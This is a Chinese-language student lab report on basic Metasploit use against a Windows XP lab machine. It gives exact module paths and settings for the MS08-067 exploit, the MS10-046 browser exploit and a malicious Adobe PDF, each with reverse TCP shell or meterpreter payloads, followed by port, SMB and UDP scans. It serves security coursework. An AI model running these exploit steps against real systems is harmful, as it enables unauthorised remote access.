Exp5 MSF基础应用

【实践要求】

1.一个主动攻击,如ms08_067

2.一个针对浏览器的攻击,如ms11_050

3.一个针对客户端的攻击,如Adobe

4.成功应用任何一个辅助模块

【基础知识问答】

用自己的话解释什么是exploit,payload,encode

  • exploit渗透攻击模块,利用发现的安全漏洞对远程系统进行攻击
  • Payload攻击载荷模块,渗透攻击成功后在目标系统中运行的代码,exploit把payload运过去,payload实现攻击
  • Encode编码器模块,为了确保Exploit、payload “安全”,不会混入“坏字符”

【实践过程】

准备:
安装英文版xp系统
1350877-20180424210433587-2144847110.png
ip
1350877-20180424210449942-62589155.png
1350877-20180424210456407-104749639.png

1.Windows服务渗透攻击——MS08-067安全漏洞
调用该模块,并且查看可以使用的payload

use exploit/windows/smb/ms08_067_netapi
1350877-20180424210527800-591285173.png

show payloads 查看需要设置的信息

set payload generic/shell_reverse_tcp设置payload,tcp反向回连

set LHOST 192.168.29.129 攻击机kali ip

set LPORT 4330攻击端口

set RHOST 192.168.29.130靶机winxp ip

set target 0自动选择目标系统类型,匹配度较高

1350877-20180424210734650-676358369.png

show options看一下配置是否都正确

最后exploit开启监听

1350877-20180424210910923-1002324351.png

纳尼。。。不成功什么鬼
找原因原来是xp防火墙没关 尴尬

好了很完美

1350877-20180424210923903-1830415586.png

2. 对浏览器攻击:ms10_046漏洞攻击

基本步骤还是和上面一样

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用
show payloads
查看可以供我们使用的payload:

1350877-20180426192048228-1856956253.png

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

设置好参数后,进行查看:

使用exploit指令执行漏洞,可以看到生成了一个url:

1350877-20180426192112936-134759272.png

在靶机的IE浏览器上使用该url进行访问

1350877-20180426192129488-1261020209.png

在MSF终端看见漏洞执行成功:

1350877-20180426192157321-1179239615.png

ok

3.针对Adobe的攻击

search adobe 搜索可以用来攻击adobe软件的模块,选择一个使用。
我选择的是adobe_cooltype_sing

use exploit/windows/browser/adobe_cooltype_sing

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.29.129

set LPORT 4330

set FILENAME 20154330.pdf

1350877-20180426210413325-185060097.png

同理,设置payload 、LHOST 、LPORT 、文件名称,输入exploit 就能生成,由于我用的是 browser 下的攻击模块,所以它会生成一个 url 链接,点开会自动下载一个空白的 pdf 文件。

1350877-20180426210431168-1611737432.png

拷贝到xp系统打开
1350877-20180426210454526-1189095152.png

出现Successfully
输入sessions查看当前存在的会话,可以看到存在两个回话

1350877-20180426210545084-1208735951.png

我们选择第一个
sessions -i 1
1350877-20180426210631684-356321204.png

查看一下ip
ok

4.辅助模块应用

找了一个tcp端口扫描的辅助模块感觉好简单所以就多找了几个

4.1tcp端口扫描

使用指令 use auxiliary/scanner/portscan/tcp 扫描目标主机上TCP使用的端口号,设置下靶机IP,run.

1350877-20180426212419336-1926791879.png

4.2smb_version

使用指令 show auxiliary 可以查看当前版本可用的辅助功能模块

使用 scanner/smb/smb_version 可以查看靶机的smb版本,输入指令 show options查看需要设定的配置。

设定完后,run 运行。

1350877-20180426212438610-1552786273.png

4.3检测常用的udp服务

使用指令 use auxiliary/scanner/discovery/udp_sweep 检测目标主机上常用的udp服务,设置下靶机IP就行。

1350877-20180426212449183-1989723222.png
我们可以看一下xp系统上的mac地址
1350877-20180426213028379-40106469.png
完美!!!!!

【实践体会】

本次实践主要是善意的攻击别人电脑(渗透测试)。本次实验分为四个小实验,相对而言都是比较简单的,但是我觉得都特别有意思,以后有时间可以经常试试windows7的或者windows10也是可以的,总之xp系统的攻击不能说是特别娴熟,但是相关漏洞只要能够看的懂,都可以一试,至于成不成功那就不好说了呀。。。。

转载于:https://www.cnblogs.com/zhangweiye20154330/p/8933701.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值